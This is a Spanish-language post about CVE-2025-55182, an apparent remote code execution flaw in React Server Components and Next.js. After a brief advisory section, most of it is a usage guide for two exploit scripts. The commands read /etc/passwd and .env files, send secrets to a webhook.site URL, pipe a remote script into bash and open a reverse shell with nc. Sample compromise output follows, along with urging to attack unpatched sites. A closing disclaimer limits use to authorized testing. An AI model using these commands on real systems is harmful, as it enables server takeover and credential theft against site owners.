
CVE-2025-55182
✅ Esto significa que atacantes podrían ejecutar código arbitrario del lado del servidor con una sola solicitud manipulada.
⚠️ Sistemas que utilicen React Server Components, incluyendo:
✅ Paquetes React server DOM
✅ Frameworks que incluyan RSC, como:
❌ No afectados:
🔍 Escanear paquetes vulnerables transitivos
🧾 Usar:
npm auditpnpm audityarn audit⚠️ Estas solo reducen el riesgo — NO reemplazan el parcheo
✅ Desarrolladores Full-stack que usen Next.js App Router
✅ Equipos DevOps que alojen apps React SSR
✅ Ingenieros de seguridad que monitoreen:
🚨 Si tu app usa React Server Components y no está parcheada — potencialmente está completamente comprometida ahora mismo.
CVE-2025-55182.py (RCE básica)
# Información básica
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"
# Leer archivos
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"
# Exfiltrar
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
# Descargar y ejecutar (si wget/curl existen)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
CVE-2025-55182-revshell.py (reverse shell instantánea)
# 1. Iniciar listener (una vez)
nc -lvnp 4444
# 2. Disparar → shell en <3 segundos
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Eso es literalmente todo.
Dos scripts, estos 8 comandos → compromiso total en cualquier sitio Next.js sin parchear hoy.
Ve a por esos bounties.
Esto es exactamente lo que verás en tiempo real cuando el exploit funcione (objetivo 100% sin parchear, 3 de diciembre de 2025):
1. Cuando ejecutas el script normal de RCE (CVE-2025-55182.py)
Escribes:
./CVE-2025-55182.py https://target.com "whoami"
Ves instantáneamente en tu pantalla:
[+] CVE-2025-55182 Exploit
[+] Target : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node
→ Ese "node" (o lo que devuelva el comando) es la salida real del servidor víctima.
Si ejecutas id verás las líneas completas de uid/gid, etc.
2. Cuando ejecutas el script de reverse shell (CVE-2025-55182-revshell.py)
Escribes:
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Ves instantáneamente en tu terminal del listener:
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node 4096 Dec 3 12:34 .
drwxr-xr-x 1 root root 4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node 420 Dec 3 11:11 .env
...
→ Shell TTY interactiva completa como el usuario node (casi siempre el usuario de la app web). Tienes el control de la máquina.
Eso es literalmente todo.
Si ves algo de lo anterior → el exploit funcionó al 100%.
Si solo obtienes HTTP 403/404 o nada → ya está parcheado o bloqueado por el WAF.
Ve a cazar.
descargo de responsabilidad
Este PoC es solo para pruebas de seguridad autorizadas y uso educativo.
No lo ejecutes contra ningún sistema que no poseas o para el cual no tengas permiso explícito por escrito para probar.
El uso no autorizado es ilegal y puede conllevar un proceso penal.
Úsalo solo en tu laboratorio, programas de bug bounty con alcance claro o en objetivos que te hayan dado permiso.
Tú eres 100% responsable de tus acciones.